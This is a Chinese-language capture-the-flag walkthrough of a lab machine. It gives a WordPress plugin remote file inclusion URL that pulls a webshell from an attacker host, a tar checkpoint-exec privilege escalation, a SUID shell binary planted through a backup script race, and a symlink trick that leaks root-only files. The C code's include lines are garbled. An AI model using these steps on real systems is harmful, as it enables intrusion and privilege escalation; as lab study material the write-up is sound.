- wpscan扫描插件漏洞
- linux命令提权(https://gtfobins.github.io/)
- ln -s
- stty的连接
- diff会访问链接地址
端口扫描只开放了80,简单的目录扫描发现只有一个robots.txt
里面的东西打开都没什么用
然后看到目录扫描还找到一个wordpress的地址
直接上wpscan扫描
wpscan --url http://10.10.10.88/webservices/wp --enumerate p,u --plugins-detection aggressive
扫描结果显示有一个插件存在漏洞
直接找一下这个插件是否有其他的漏洞
查看文件里面对应的payload,把webshell的名字改成要求的名字wp-load.php
http://10.10.10.88/webservices/wp/wp-content/plugins/gwolle-gb/frontend/captcha/ajaxresponse.php?abspath=http://10.10.14.5/
kali上nc监听端口有shell连接
sudo -l查看
得知我们可以作为用户onuma的身份执行tar命令,用到的命令,从下面的网站中摘抄
linux命令执行shell合集
用到的命令sudo -u onuma /bin/tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh
然后发现一个服务backuperer最近运行过,并且每5min运行一次
直接找到,backuperer位置
查看文件类型和内容
cat /usr/sbin/backuperer
#!/bin/bash
#-------------------------------------------------------------------------------------
# backuperer ver 1.0.2 - by ȜӎŗgͷͼȜ
# ONUMA Dev auto backup program
# This tool will keep our webapp backed up incase another skiddie defaces us again.
# We will be able to quickly restore from a backup in seconds ;P
#-------------------------------------------------------------------------------------
# Set Vars Here
basedir=/var/www/html
bkpdir=/var/backups
tmpdir=/var/tmp
testmsg=$bkpdir/onuma_backup_test.txt
errormsg=$bkpdir/onuma_backup_error.txt
tmpfile=$tmpdir/.$(/usr/bin/head -c100 /dev/urandom |sha1sum|cut -d' ' -f1)
check=$tmpdir/check
# formatting
printbdr()
{
for n in $(seq 72);
do /usr/bin/printf $"-";
done
}
bdr=$(printbdr)
# Added a test file to let us see when the last backup was run
/usr/bin/printf $"$bdr\nAuto backup backuperer backup last ran at : $(/bin/date)\n$bdr\n" > $testmsg
# Cleanup from last time.
/bin/rm -rf $tmpdir/.* $check
# Backup onuma website dev files.
/usr/bin/sudo -u onuma /bin/tar -zcvf $tmpfile $basedir &
# Added delay to wait for backup to complete if large files get added.
/bin/sleep 30
# Test the backup integrity
integrity_chk()
{
/usr/bin/diff -r $basedir $check$basedir
}
/bin/mkdir $check
/bin/tar -zxvf $tmpfile -C $check
if [[ $(integrity_chk) ]]
then
# Report errors so the dev can investigate the issue.
/usr/bin/printf $"$bdr\nIntegrity Check Error in backup last ran : $(/bin/date)\n$bdr\n$tmpfile\n" >> $errormsg
integrity_chk >> $errormsg
exit 2
else
# Clean up and save archive to the bkpdir.
/bin/mv $tmpfile $bkpdir/onuma-www-dev.bak
/bin/rm -rf $check .*
exit 0
fi
脚本逻辑大体如下,先把目标/var/www/html目录打包到/var/tmp,并且命名以点为开头的文件,等待30s,然后把这个文件进行解压,路径为/var/tmp/check,然后跟/var/www/html目录对比
首先在自己本地编译出一个可执行代码,然后添加suid,
代码如下
#include
#include
#include
#include
int main(void)
{
setuid(0);setgid(0);system("/bin/sh");
}
然后按照靶机路径/var/www/html打包成一个压缩包,传到靶机/var/tmp路径下
然后要开一个stty
$ python -c 'import pty;pty.spawn("/bin/bash")'
CTRL+Z
root@kali:~/Desktop# stty raw -echo
fg
Enter
Enter
以上为非必须的,下面内容为必须的
onuma@TartarSauce:/$ stty rows 34 columns 194
stty rows 23 columns 79
onuma@TartarSauce:/$ export TERM=xterm-color
export TERM=xterm-color
然后执行systemctl list-timers,等倒计时结束之后,把我们的tar包跟目标文件替换
嫌麻烦的可以执行watch -n 1 'systemctl list-timers'()这样就不用怕ctrl+c断开连接了,但是一样能停止命令执行),但是必须执行过前面说的非必须的内容
稍等一会就会有一个check目录产生
打开里面得目录就能得到之前编译过的可执行文件,执行之后成功切换到root权限
第二种方法(非提权,拿flag)
diff会访问,连接文件指向的位置
在/var/www/html下创建一个文件1.txt,然后将/var/www/html目录打包至/var/tmp下然后用软连接把里面的1.txt进行替换,等到备份程序执行后,把文件进行替换,然后30s后查看/var/backups/onuma_backup_error.txt,即可得到flag
ln -s /root/root.txt var/www/html/1.txt